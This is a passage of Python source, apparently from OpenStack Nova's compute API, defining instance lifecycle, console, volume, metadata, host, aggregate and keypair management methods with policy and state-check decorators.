@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.SHELVED,
vm_states.SHELVED_OFFLOADED])
def unshelve(self, context, instance):
"""Restore a shelved instance."""
instance.task_state = task_states.UNSHELVING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.UNSHELVE)
self.compute_task_api.unshelve_instance(context, instance)
@wrap_check_policy
@check_instance_lock
def add_fixed_ip(self, context, instance, network_id):
"""Add fixed_ip from specified network to given instance."""
self.compute_rpcapi.add_fixed_ip_to_instance(context,
instance=instance, network_id=network_id)
@wrap_check_policy
@check_instance_lock
def remove_fixed_ip(self, context, instance, address):
"""Remove fixed_ip from specified network to given instance."""
self.compute_rpcapi.remove_fixed_ip_from_instance(context,
instance=instance, address=address)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE])
def pause(self, context, instance):
"""Pause the given instance."""
instance.task_state = task_states.PAUSING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.PAUSE)
self.compute_rpcapi.pause_instance(context, instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.PAUSED])
def unpause(self, context, instance):
"""Unpause the given instance."""
instance.task_state = task_states.UNPAUSING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.UNPAUSE)
self.compute_rpcapi.unpause_instance(context, instance)
@wrap_check_policy
def get_diagnostics(self, context, instance):
"""Retrieve diagnostics for the given instance."""
return self.compute_rpcapi.get_diagnostics(context, instance=instance)
@wrap_check_policy
def get_instance_diagnostics(self, context, instance):
"""Retrieve diagnostics for the given instance."""
return self.compute_rpcapi.get_instance_diagnostics(context,
instance=instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE])
def suspend(self, context, instance):
"""Suspend the given instance."""
instance.task_state = task_states.SUSPENDING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.SUSPEND)
self.compute_rpcapi.suspend_instance(context, instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.SUSPENDED])
def resume(self, context, instance):
"""Resume the given instance."""
instance.task_state = task_states.RESUMING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.RESUME)
self.compute_rpcapi.resume_instance(context, instance)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.ERROR])
def rescue(self, context, instance, rescue_password=None,
rescue_image_ref=None):
"""Rescue the given instance."""
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
for bdm in bdms:
if bdm.volume_id:
vol = self.volume_api.get(context, bdm.volume_id)
self.volume_api.check_attached(context, vol)
if self.is_volume_backed_instance(context, instance, bdms):
reason = _("Cannot rescue a volume-backed instance")
raise exception.InstanceNotRescuable(instance_id=instance.uuid,
reason=reason)
instance.task_state = task_states.RESCUING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.RESCUE)
self.compute_rpcapi.rescue_instance(context, instance=instance,
rescue_password=rescue_password, rescue_image_ref=rescue_image_ref)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.RESCUED])
def unrescue(self, context, instance):
"""Unrescue the given instance."""
instance.task_state = task_states.UNRESCUING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.UNRESCUE)
self.compute_rpcapi.unrescue_instance(context, instance=instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE])
def set_admin_password(self, context, instance, password=None):
"""Set the root/admin password for the given instance.
@param context: Nova auth context.
@param instance: Nova instance object.
@param password: The admin password for the instance.
"""
instance.task_state = task_states.UPDATING_PASSWORD
instance.save(expected_task_state=[None])
self._record_action_start(context, instance,
instance_actions.CHANGE_PASSWORD)
self.compute_rpcapi.set_admin_password(context,
instance=instance,
new_pass=password)
@wrap_check_policy
@check_instance_host
def get_vnc_console(self, context, instance, console_type):
"""Get a url to an instance Console."""
connect_info = self.compute_rpcapi.get_vnc_console(context,
instance=instance, console_type=console_type)
self.consoleauth_rpcapi.authorize_console(context,
connect_info['token'], console_type,
connect_info['host'], connect_info['port'],
connect_info['internal_access_path'], instance['uuid'])
return {'url': connect_info['access_url']}
@check_instance_host
def get_vnc_connect_info(self, context, instance, console_type):
"""Used in a child cell to get console info."""
connect_info = self.compute_rpcapi.get_vnc_console(context,
instance=instance, console_type=console_type)
return connect_info
@wrap_check_policy
@check_instance_host
def get_spice_console(self, context, instance, console_type):
"""Get a url to an instance Console."""
connect_info = self.compute_rpcapi.get_spice_console(context,
instance=instance, console_type=console_type)
self.consoleauth_rpcapi.authorize_console(context,
connect_info['token'], console_type,
connect_info['host'], connect_info['port'],
connect_info['internal_access_path'], instance['uuid'])
return {'url': connect_info['access_url']}
@check_instance_host
def get_spice_connect_info(self, context, instance, console_type):
"""Used in a child cell to get console info."""
connect_info = self.compute_rpcapi.get_spice_console(context,
instance=instance, console_type=console_type)
return connect_info
@wrap_check_policy
@check_instance_host
def get_rdp_console(self, context, instance, console_type):
"""Get a url to an instance Console."""
connect_info = self.compute_rpcapi.get_rdp_console(context,
instance=instance, console_type=console_type)
self.consoleauth_rpcapi.authorize_console(context,
connect_info['token'], console_type,
connect_info['host'], connect_info['port'],
connect_info['internal_access_path'], instance['uuid'])
return {'url': connect_info['access_url']}
@check_instance_host
def get_rdp_connect_info(self, context, instance, console_type):
"""Used in a child cell to get console info."""
connect_info = self.compute_rpcapi.get_rdp_console(context,
instance=instance, console_type=console_type)
return connect_info
@wrap_check_policy
@check_instance_host
def get_serial_console(self, context, instance, console_type):
"""Get a url to a serial console."""
connect_info = self.compute_rpcapi.get_serial_console(context,
instance=instance, console_type=console_type)
self.consoleauth_rpcapi.authorize_console(context,
connect_info['token'], console_type,
connect_info['host'], connect_info['port'],
connect_info['internal_access_path'], instance['uuid'])
return {'url': connect_info['access_url']}
@check_instance_host
def get_serial_console_connect_info(self, context, instance, console_type):
"""Used in a child cell to get serial console."""
connect_info = self.compute_rpcapi.get_serial_console(context,
instance=instance, console_type=console_type)
return connect_info
@wrap_check_policy
@check_instance_host
def get_console_output(self, context, instance, tail_length=None):
"""Get console output for an instance."""
return self.compute_rpcapi.get_console_output(context,
instance=instance, tail_length=tail_length)
@wrap_check_policy
def lock(self, context, instance):
"""Lock the given instance."""
# Only update the lock if we are an admin (non-owner)
is_owner = instance.project_id == context.project_id
if instance.locked and is_owner:
return
context = context.elevated()
LOG.debug('Locking', context=context, instance=instance)
instance.locked = True
instance.locked_by = 'owner' if is_owner else 'admin'
instance.save()
@wrap_check_policy
def unlock(self, context, instance):
"""Unlock the given instance."""
# If the instance was locked by someone else, check
# that we're allowed to override the lock
is_owner = instance.project_id == context.project_id
expect_locked_by = 'owner' if is_owner else 'admin'
locked_by = instance.locked_by
if locked_by and locked_by != expect_locked_by:
check_policy(context, 'unlock_override', instance)
context = context.elevated()
LOG.debug('Unlocking', context=context, instance=instance)
instance.locked = False
instance.locked_by = None
instance.save()
@wrap_check_policy
def get_lock(self, context, instance):
"""Return the boolean state of given instance's lock."""
return self.get(context, instance['uuid'])['locked']
@wrap_check_policy
@check_instance_lock
@check_instance_cell
def reset_network(self, context, instance):
"""Reset networking on the instance."""
self.compute_rpcapi.reset_network(context, instance=instance)
@wrap_check_policy
@check_instance_lock
@check_instance_cell
def inject_network_info(self, context, instance):
"""Inject network info for the instance."""
self.compute_rpcapi.inject_network_info(context, instance=instance)
def _attach_volume(self, context, instance, volume_id, device,
disk_bus, device_type):
"""Attach an existing volume to an existing instance.
This method is separated to make it possible for cells version
to override it.
"""
# NOTE(vish): This is done on the compute host because we want
# to avoid a race where two devices are requested at
# the same time. When db access is removed from
# compute, the bdm will be created here and we will
# have to make sure that they are assigned atomically.
volume_bdm = self.compute_rpcapi.reserve_block_device_name(
context, instance, device, volume_id, disk_bus=disk_bus,
device_type=device_type)
try:
volume = self.volume_api.get(context, volume_id)
self.volume_api.check_attach(context, volume, instance=instance)
self.volume_api.reserve_volume(context, volume_id)
self.compute_rpcapi.attach_volume(context, instance=instance,
volume_id=volume_id, mountpoint=device, bdm=volume_bdm)
except Exception:
with excutils.save_and_reraise_exception():
volume_bdm.destroy(context)
return volume_bdm.device_name
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.STOPPED, vm_states.RESIZED,
vm_states.SOFT_DELETED])
def attach_volume(self, context, instance, volume_id, device=None,
disk_bus=None, device_type=None):
"""Attach an existing volume to an existing instance."""
# NOTE(vish): Fail fast if the device is not going to pass. This
# will need to be removed along with the test if we
# change the logic in the manager for what constitutes
# a valid device.
if device and not block_device.match_device(device):
raise exception.InvalidDevicePath(path=device)
return self._attach_volume(context, instance, volume_id, device,
disk_bus, device_type)
def _detach_volume(self, context, instance, volume):
"""Detach volume from instance.
This method is separated to make it easier for cells version
to override.
"""
self.volume_api.check_detach(context, volume)
self.volume_api.begin_detaching(context, volume['id'])
self.compute_rpcapi.detach_volume(context, instance=instance,
volume_id=volume['id'])
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.STOPPED, vm_states.RESIZED,
vm_states.SOFT_DELETED])
def detach_volume(self, context, instance, volume):
"""Detach a volume from an instance."""
if volume['attach_status'] == 'detached':
msg = _("Volume must be attached in order to detach.")
raise exception.InvalidVolume(reason=msg)
# The caller likely got the instance from volume['instance_uuid']
# in the first place, but let's sanity check.
if volume['instance_uuid'] != instance['uuid']:
raise exception.VolumeUnattached(volume_id=volume['id'])
self._detach_volume(context, instance, volume)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.SUSPENDED, vm_states.STOPPED,
vm_states.RESIZED, vm_states.SOFT_DELETED])
def swap_volume(self, context, instance, old_volume, new_volume):
"""Swap volume attached to an instance."""
if old_volume['attach_status'] == 'detached':
raise exception.VolumeUnattached(volume_id=old_volume['id'])
# The caller likely got the instance from volume['instance_uuid']
# in the first place, but let's sanity check.
if old_volume['instance_uuid'] != instance['uuid']:
msg = _("Old volume is attached to a different instance.")
raise exception.InvalidVolume(reason=msg)
if new_volume['attach_status'] == 'attached':
msg = _("New volume must be detached in order to swap.")
raise exception.InvalidVolume(reason=msg)
if int(new_volume['size']) < int(old_volume['size']):
msg = _("New volume must be the same size or larger.")
raise exception.InvalidVolume(reason=msg)
self.volume_api.check_detach(context, old_volume)
self.volume_api.check_attach(context, new_volume, instance=instance)
self.volume_api.begin_detaching(context, old_volume['id'])
self.volume_api.reserve_volume(context, new_volume['id'])
try:
self.compute_rpcapi.swap_volume(
context, instance=instance,
old_volume_id=old_volume['id'],
new_volume_id=new_volume['id'])
except Exception: # pylint: disable=W0702
with excutils.save_and_reraise_exception():
self.volume_api.roll_detaching(context, old_volume['id'])
self.volume_api.unreserve_volume(context, new_volume['id'])
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.STOPPED],
task_state=[None])
def attach_interface(self, context, instance, network_id, port_id,
requested_ip):
"""Use hotplug to add an network adapter to an instance."""
return self.compute_rpcapi.attach_interface(context,
instance=instance, network_id=network_id, port_id=port_id,
requested_ip=requested_ip)
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.STOPPED],
task_state=[None])
def detach_interface(self, context, instance, port_id):
"""Detach an network adapter from an instance."""
self.compute_rpcapi.detach_interface(context, instance=instance,
port_id=port_id)
@wrap_check_policy
def get_instance_metadata(self, context, instance):
"""Get all metadata associated with an instance."""
rv = self.db.instance_metadata_get(context, instance['uuid'])
return dict(rv.iteritems())
def get_all_instance_metadata(self, context, search_filts):
return self._get_all_instance_metadata(
context, search_filts, metadata_type='metadata')
def get_all_system_metadata(self, context, search_filts):
return self._get_all_instance_metadata(
context, search_filts, metadata_type='system_metadata')
def _get_all_instance_metadata(self, context, search_filts, metadata_type):
"""Get all metadata."""
def _match_any(pattern_list, string):
return any([re.match(pattern, string)
for pattern in pattern_list])
def _filter_metadata(instance, search_filt, input_metadata):
uuids = search_filt.get('resource_id', [])
keys_filter = search_filt.get('key', [])
values_filter = search_filt.get('value', [])
output_metadata = {}
if uuids and instance.get('uuid') not in uuids:
return {}
for (k, v) in input_metadata.iteritems():
# Both keys and value defined -- AND
if ((keys_filter and values_filter) and
not _match_any(keys_filter, k) and
not _match_any(values_filter, v)):
continue
# Only keys or value is defined
elif ((keys_filter and not _match_any(keys_filter, k)) or
(values_filter and not _match_any(values_filter, v))):
continue
output_metadata[k] = v
return output_metadata
formatted_metadata_list = []
instances = self._get_instances_by_filters(context, filters={},
sort_key='created_at',
sort_dir='desc')
for instance in instances:
try:
check_policy(context, 'get_all_instance_%s' % metadata_type,
instance)
metadata = instance.get(metadata_type, {})
for filt in search_filts:
# By chaining the input to the output, the filters are
# ANDed together
metadata = _filter_metadata(instance, filt, metadata)
for (k, v) in metadata.iteritems():
formatted_metadata_list.append({'key': k, 'value': v,
'instance_id': instance.get('uuid')})
except exception.PolicyNotAuthorized:
# failed policy check - not allowed to
# read this metadata
continue
return formatted_metadata_list
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.SUSPENDED, vm_states.STOPPED],
task_state=None)
def delete_instance_metadata(self, context, instance, key):
"""Delete the given metadata item from an instance."""
instance.delete_metadata_key(key)
self.compute_rpcapi.change_instance_metadata(context,
instance=instance,
diff={key: ['-']})
@wrap_check_policy
@check_instance_lock
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.PAUSED,
vm_states.SUSPENDED, vm_states.STOPPED],
task_state=None)
def update_instance_metadata(self, context, instance,
metadata, delete=False):
"""Updates or creates instance metadata.
If delete is True, metadata items that are not specified in the
`metadata` argument will be deleted.
"""
orig = dict(instance.metadata)
if delete:
_metadata = metadata
else:
_metadata = dict(instance.metadata)
_metadata.update(metadata)
self._check_metadata_properties_quota(context, _metadata)
instance.metadata = _metadata
instance.save()
diff = _diff_dict(orig, instance.metadata)
self.compute_rpcapi.change_instance_metadata(context,
instance=instance,
diff=diff)
return _metadata
def get_instance_faults(self, context, instances):
"""Get all faults for a list of instance uuids."""
if not instances:
return {}
for instance in instances:
check_policy(context, 'get_instance_faults', instance)
uuids = [instance['uuid'] for instance in instances]
return self.db.instance_fault_get_by_instance_uuids(context, uuids)
def is_volume_backed_instance(self, context, instance, bdms=None):
if not instance['image_ref']:
return True
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance['uuid'])
root_bdm = bdms.root_bdm()
if not root_bdm:
return False
return root_bdm.is_volume
@check_instance_lock
@check_instance_cell
@check_instance_state(vm_state=[vm_states.ACTIVE])
def live_migrate(self, context, instance, block_migration,
disk_over_commit, host_name):
"""Migrate a server lively to a new host."""
LOG.debug("Going to try to live migrate instance to %s",
host_name or "another host", instance=instance)
instance.task_state = task_states.MIGRATING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance,
instance_actions.LIVE_MIGRATION)
self.compute_task_api.live_migrate_instance(context, instance,
host_name, block_migration=block_migration,
disk_over_commit=disk_over_commit)
@check_instance_state(vm_state=[vm_states.ACTIVE, vm_states.STOPPED,
vm_states.ERROR])
def evacuate(self, context, instance, host, on_shared_storage,
admin_password=None):
"""Running evacuate to target host.
Checking vm compute host state, if the host not in expected_state,
raising an exception.
:param instance: The instance to evacuate
:param host: Target host. if not set, the scheduler will pick up one
:param on_shared_storage: True if instance files on shared storage
:param admin_password: password to set on rebuilt instance
"""
LOG.debug('vm evacuation scheduled', instance=instance)
inst_host = instance.host
service = objects.Service.get_by_compute_host(context, inst_host)
if self.servicegroup_api.service_is_up(service):
msg = (_('Instance compute service state on %s '
'expected to be down, but it was up.') % inst_host)
LOG.error(msg)
raise exception.ComputeServiceInUse(host=inst_host)
instance.task_state = task_states.REBUILDING
instance.save(expected_task_state=[None])
self._record_action_start(context, instance, instance_actions.EVACUATE)
return self.compute_task_api.rebuild_instance(context,
instance=instance,
new_pass=admin_password,
injected_files=None,
image_ref=None,
orig_image_ref=None,
orig_sys_metadata=None,
bdms=None,
recreate=True,
on_shared_storage=on_shared_storage,
host=host)
def get_migrations(self, context, filters):
"""Get all migrations for the given filters."""
return objects.MigrationList.get_by_filters(context, filters)
@wrap_check_policy
def volume_snapshot_create(self, context, volume_id, create_info):
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id, expected_attrs=['instance'])
self.compute_rpcapi.volume_snapshot_create(context, bdm.instance,
volume_id, create_info)
snapshot = {
'snapshot': {
'id': create_info.get('id'),
'volumeId': volume_id
}
}
return snapshot
@wrap_check_policy
def volume_snapshot_delete(self, context, volume_id, snapshot_id,
delete_info):
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id, expected_attrs=['instance'])
self.compute_rpcapi.volume_snapshot_delete(context, bdm.instance,
volume_id, snapshot_id, delete_info)
def external_instance_event(self, context, instances, events):
# NOTE(danms): The external API consumer just provides events,
# but doesn't know where they go. We need to collate lists
# by the host the affected instance is on and dispatch them
# according to host
instances_by_host = {}
events_by_host = {}
hosts_by_instance = {}
for instance in instances:
instances_on_host = instances_by_host.get(instance.host, [])
instances_on_host.append(instance)
instances_by_host[instance.host] = instances_on_host
hosts_by_instance[instance.uuid] = instance.host
for event in events:
host = hosts_by_instance[event.instance_uuid]
events_on_host = events_by_host.get(host, [])
events_on_host.append(event)
events_by_host[host] = events_on_host
for host in instances_by_host:
# TODO(salv-orlando): Handle exceptions raised by the rpc api layer
# in order to ensure that a failure in processing events on a host
# will not prevent processing events on other hosts
self.compute_rpcapi.external_instance_event(
context, instances_by_host[host], events_by_host[host])
class HostAPI(base.Base):
"""Sub-set of the Compute Manager API for managing host operations."""
def __init__(self, rpcapi=None):
self.rpcapi = rpcapi or compute_rpcapi.ComputeAPI()
self.servicegroup_api = servicegroup.API()
super(HostAPI, self).__init__()
def _assert_host_exists(self, context, host_name, must_be_up=False):
"""Raise HostNotFound if compute host doesn't exist."""
service = objects.Service.get_by_compute_host(context, host_name)
if not service:
raise exception.HostNotFound(host=host_name)
if must_be_up and not self.servicegroup_api.service_is_up(service):
raise exception.ComputeServiceUnavailable(host=host_name)
return service['host']
@wrap_exception()
def set_host_enabled(self, context, host_name, enabled):
"""Sets the specified host's ability to accept new instances."""
host_name = self._assert_host_exists(context, host_name)
payload = {'host_name': host_name, 'enabled': enabled}
compute_utils.notify_about_host_update(context,
'set_enabled.start',
payload)
result = self.rpcapi.set_host_enabled(context, enabled=enabled,
host=host_name)
compute_utils.notify_about_host_update(context,
'set_enabled.end',
payload)
return result
def get_host_uptime(self, context, host_name):
"""Returns the result of calling "uptime" on the target host."""
host_name = self._assert_host_exists(context, host_name,
must_be_up=True)
return self.rpcapi.get_host_uptime(context, host=host_name)
@wrap_exception()
def host_power_action(self, context, host_name, action):
"""Reboots, shuts down or powers up the host."""
host_name = self._assert_host_exists(context, host_name)
payload = {'host_name': host_name, 'action': action}
compute_utils.notify_about_host_update(context,
'power_action.start',
payload)
result = self.rpcapi.host_power_action(context, action=action,
host=host_name)
compute_utils.notify_about_host_update(context,
'power_action.end',
payload)
return result
@wrap_exception()
def set_host_maintenance(self, context, host_name, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
host_name = self._assert_host_exists(context, host_name)
payload = {'host_name': host_name, 'mode': mode}
compute_utils.notify_about_host_update(context,
'set_maintenance.start',
payload)
result = self.rpcapi.host_maintenance_mode(context,
host_param=host_name, mode=mode, host=host_name)
compute_utils.notify_about_host_update(context,
'set_maintenance.end',
payload)
return result
def service_get_all(self, context, filters=None, set_zones=False):
"""Returns a list of services, optionally filtering the results.
If specified, 'filters' should be a dictionary containing services
attributes and matching values. Ie, to get a list of services for
the 'compute' topic, use filters={'topic': 'compute'}.
"""
if filters is None:
filters = {}
disabled = filters.pop('disabled', None)
if 'availability_zone' in filters:
set_zones = True
services = objects.ServiceList.get_all(context, disabled,
set_zones=set_zones)
ret_services = []
for service in services:
for key, val in filters.iteritems():
if service[key] != val:
break
else:
# All filters matched.
ret_services.append(service)
return ret_services
def service_get_by_compute_host(self, context, host_name):
"""Get service entry for the given compute hostname."""
return objects.Service.get_by_compute_host(context, host_name)
def service_update(self, context, host_name, binary, params_to_update):
"""Enable / Disable a service.
For compute services, this stops new builds and migrations going to
the host.
"""
service = objects.Service.get_by_args(context, host_name, binary)
service.update(params_to_update)
service.save()
return service
def service_delete(self, context, service_id):
"""Deletes the specified service."""
objects.Service.get_by_id(context, service_id).destroy()
def instance_get_all_by_host(self, context, host_name):
"""Return all instances on the given host."""
return self.db.instance_get_all_by_host(context, host_name)
def task_log_get_all(self, context, task_name, period_beginning,
period_ending, host=None, state=None):
"""Return the task logs within a given range, optionally
filtering by host and/or state.
"""
return self.db.task_log_get_all(context, task_name,
period_beginning,
period_ending,
host=host,
state=state)
def compute_node_get(self, context, compute_id):
"""Return compute node entry for particular integer ID."""
return self.db.compute_node_get(context, int(compute_id))
def compute_node_get_all(self, context):
return self.db.compute_node_get_all(context)
def compute_node_search_by_hypervisor(self, context, hypervisor_match):
return self.db.compute_node_search_by_hypervisor(context,
hypervisor_match)
def compute_node_statistics(self, context):
return self.db.compute_node_statistics(context)
class InstanceActionAPI(base.Base):
"""Sub-set of the Compute Manager API for managing instance actions."""
def actions_get(self, context, instance):
return objects.InstanceActionList.get_by_instance_uuid(
context, instance['uuid'])
def action_get_by_request_id(self, context, instance, request_id):
return objects.InstanceAction.get_by_request_id(
context, instance['uuid'], request_id)
def action_events_get(self, context, instance, action_id):
return objects.InstanceActionEventList.get_by_action(
context, action_id)
class AggregateAPI(base.Base):
"""Sub-set of the Compute Manager API for managing host aggregates."""
def __init__(self, **kwargs):
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
super(AggregateAPI, self).__init__(**kwargs)
@wrap_exception()
def create_aggregate(self, context, aggregate_name, availability_zone):
"""Creates the model for the aggregate."""
aggregate = objects.Aggregate()
aggregate.name = aggregate_name
if availability_zone:
aggregate.metadata = {'availability_zone': availability_zone}
aggregate.create(context)
return aggregate
def get_aggregate(self, context, aggregate_id):
"""Get an aggregate by id."""
return objects.Aggregate.get_by_id(context, aggregate_id)
def get_aggregate_list(self, context):
"""Get all the aggregates."""
return objects.AggregateList.get_all(context)
@wrap_exception()
def update_aggregate(self, context, aggregate_id, values):
"""Update the properties of an aggregate."""
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
if 'name' in values:
aggregate.name = values.pop('name')
aggregate.save()
self.is_safe_to_update_az(context, values, aggregate=aggregate,
action_name="update_aggregate")
if values:
aggregate.update_metadata(values)
# If updated values include availability_zones, then the cache
# which stored availability_zones and host need to be reset
if values.get('availability_zone'):
availability_zones.reset_cache()
return aggregate
@wrap_exception()
def update_aggregate_metadata(self, context, aggregate_id, metadata):
"""Updates the aggregate metadata."""
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
self.is_safe_to_update_az(context, metadata, aggregate=aggregate,
action_name="update_aggregate_metadata")
aggregate.update_metadata(metadata)
# If updated metadata include availability_zones, then the cache
# which stored availability_zones and host need to be reset
if metadata and metadata.get('availability_zone'):
availability_zones.reset_cache()
return aggregate
@wrap_exception()
def delete_aggregate(self, context, aggregate_id):
"""Deletes the aggregate."""
aggregate_payload = {'aggregate_id': aggregate_id}
compute_utils.notify_about_aggregate_update(context,
"delete.start",
aggregate_payload)
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
if len(aggregate.hosts) > 0:
msg = _("Host aggregate is not empty")
raise exception.InvalidAggregateAction(action='delete',
aggregate_id=aggregate_id,
reason=msg)
aggregate.destroy()
compute_utils.notify_about_aggregate_update(context,
"delete.end",
aggregate_payload)
def is_safe_to_update_az(self, context, metadata, aggregate,
hosts=None, action_name="add_host_to_aggregate"):
"""Determine if updates alter an aggregate's availability zone.
:param context: local context
:param metadata: Target metadata for updating aggregate
:param aggregate: Aggregate to update
:param hosts: Hosts to check. If None, aggregate.hosts is used
:type hosts: list
:action_name: Calling method for logging purposes
"""
if 'availability_zone' in metadata:
_hosts = hosts or aggregate.hosts
zones, not_zones = availability_zones.get_availability_zones(
context, with_hosts=True)
for host in _hosts:
# NOTE(sbauza): Host can only be in one AZ, so let's take only
# the first element
host_azs = [az for (az, az_hosts) in zones
if host in az_hosts
and az != CONF.internal_service_availability_zone]
host_az = host_azs.pop()
if host_azs:
LOG.warning(_("More than 1 AZ for host %s"), host)
if host_az == CONF.default_availability_zone:
# NOTE(sbauza): Aggregate with AZ set to default AZ can
# exist, we need to check
host_aggs = objects.AggregateList.get_by_host(
context, host, key='availability_zone')
default_aggs = [agg for agg in host_aggs
if agg['metadata'].get(
'availability_zone'
) == CONF.default_availability_zone]
else:
default_aggs = []
if (host_az != aggregate.metadata.get('availability_zone') and
(host_az != CONF.default_availability_zone or
len(default_aggs) != 0)):
self._check_az_for_host(
metadata, host_az, aggregate.id,
action_name=action_name)
def _check_az_for_host(self, aggregate_meta, host_az, aggregate_id,
action_name="add_host_to_aggregate"):
# NOTE(mtreinish) The availability_zone key returns a set of
# zones so loop over each zone. However there should only
# ever be one zone in the set because an aggregate can only
# have a single availability zone set at one time.
if isinstance(aggregate_meta["availability_zone"], six.string_types):
azs = set([aggregate_meta["availability_zone"]])
else:
azs = aggregate_meta["availability_zone"]
for aggregate_az in azs:
# NOTE(mtreinish) Ensure that the aggregate_az is not none
# if it is none then that is just a regular aggregate and
# it is valid to have a host in multiple aggregates.
if aggregate_az and aggregate_az != host_az:
msg = _("Host already in availability zone "
"%s") % host_az
raise exception.InvalidAggregateAction(
action=action_name, aggregate_id=aggregate_id,
reason=msg)
def _update_az_cache_for_host(self, context, host_name, aggregate_meta):
# Update the availability_zone cache to avoid getting wrong
# availability_zone in cache retention time when add/remove
# host to/from aggregate.
if aggregate_meta and aggregate_meta.get('availability_zone'):
availability_zones.update_host_availability_zone_cache(context,
host_name)
@wrap_exception()
def add_host_to_aggregate(self, context, aggregate_id, host_name):
"""Adds the host to an aggregate."""
aggregate_payload = {'aggregate_id': aggregate_id,
'host_name': host_name}
compute_utils.notify_about_aggregate_update(context,
"addhost.start",
aggregate_payload)
# validates the host; ComputeHostNotFound is raised if invalid
objects.Service.get_by_compute_host(context, host_name)
metadata = self.db.aggregate_metadata_get_by_metadata_key(
context, aggregate_id, 'availability_zone')
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
self.is_safe_to_update_az(context, metadata, hosts=[host_name],
aggregate=aggregate)
aggregate.add_host(context, host_name)
self._update_az_cache_for_host(context, host_name, aggregate.metadata)
# NOTE(jogo): Send message to host to support resource pools
self.compute_rpcapi.add_aggregate_host(context,
aggregate=aggregate, host_param=host_name, host=host_name)
aggregate_payload.update({'name': aggregate['name']})
compute_utils.notify_about_aggregate_update(context,
"addhost.end",
aggregate_payload)
return aggregate
@wrap_exception()
def remove_host_from_aggregate(self, context, aggregate_id, host_name):
"""Removes host from the aggregate."""
aggregate_payload = {'aggregate_id': aggregate_id,
'host_name': host_name}
compute_utils.notify_about_aggregate_update(context,
"removehost.start",
aggregate_payload)
# validates the host; ComputeHostNotFound is raised if invalid
objects.Service.get_by_compute_host(context, host_name)
aggregate = objects.Aggregate.get_by_id(context, aggregate_id)
aggregate.delete_host(host_name)
self._update_az_cache_for_host(context, host_name, aggregate.metadata)
self.compute_rpcapi.remove_aggregate_host(context,
aggregate=aggregate, host_param=host_name, host=host_name)
compute_utils.notify_about_aggregate_update(context,
"removehost.end",
aggregate_payload)
return aggregate
class KeypairAPI(base.Base):
"""Subset of the Compute Manager API for managing key pairs."""
get_notifier = functools.partial(rpc.get_notifier, service='api')
wrap_exception = functools.partial(exception.wrap_exception,
get_notifier=get_notifier)
def _notify(self, context, event_suffix, keypair_name):
payload = {
'tenant_id': context.project_id,
'user_id': context.user_id,
'key_name': keypair_name,
}
notify = self.get_notifier()
notify.info(context, 'keypair.%s' % event_suffix, payload)
def _validate_new_key_pair(self, context, user_id, key_name):
safe_chars = "_- " + string.digits + string.ascii_letters
clean_value = "".join(x for x in key_name if x in safe_chars)
if clean_value != key_name:
raise exception.InvalidKeypair(
reason=_("Keypair name contains unsafe characters"))
try:
utils.check_string_length(key_name, min_length=1, max_length=255)
except exception.InvalidInput:
raise exception.InvalidKeypair(
reason=_('Keypair name must be string and between '
'1 and 255 characters long'))
count = QUOTAS.count(context, 'key_pairs', user_id)
try:
QUOTAS.limit_check(context, key_pairs=count + 1)
except exception.OverQuota:
raise exception.KeypairLimitExceeded()
@wrap_exception()
def import_key_pair(self, context, user_id, key_name, public_key):
"""Import a key pair using an existing public key."""
self._validate_new_key_pair(context, user_id, key_name)
self._notify(context, 'import.start', key_name)
fingerprint = crypto.generate_fingerprint(public_key)
keypair = objects.KeyPair(context)
keypair.user_id = user_id
keypair.name = key_name
keypair.fingerprint = fingerprint
keypair.public_key = public_key
keypair.create()
self._notify(context, 'import.end', key_name)
return keypair
@wrap_exception()
def create_key_pair(self, context, user_id, key_name):
"""Create a new key pair."""
self._validate_new_key_pair(context, user_id, key_name)
self._notify(context, 'create.start', key_name)
private_key, public_key, fingerprint = crypto.generate_key_pair()
keypair = objects.KeyPair(context)
keypair.user_id = user_id
keypair.name = key_name
keypair.fingerprint = fingerprint
keypair.public_key = public_key
keypair.create()
self._notify(context, 'create.end', key_name)
return keypair, private_key
@wrap_exception()
